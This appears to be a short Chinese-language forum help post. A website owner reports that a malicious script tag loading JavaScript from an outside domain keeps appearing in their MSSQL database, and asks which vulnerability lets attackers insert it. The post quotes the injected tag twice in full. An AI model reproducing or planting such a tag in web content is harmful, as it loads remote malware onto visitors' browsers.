该木马怎么随时被黑客放入到MSSQL数据库内. 请问是哪的漏洞?

举报木马程序,<script src=http://okm4.org/z.js></script>该木马怎么随时被黑客放入到MSSQL数据库内. 请问是哪的漏洞?我把上传程序都给删除了的.<script src=http://okm4.org/z.js></script>

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; QQDownload 1.7)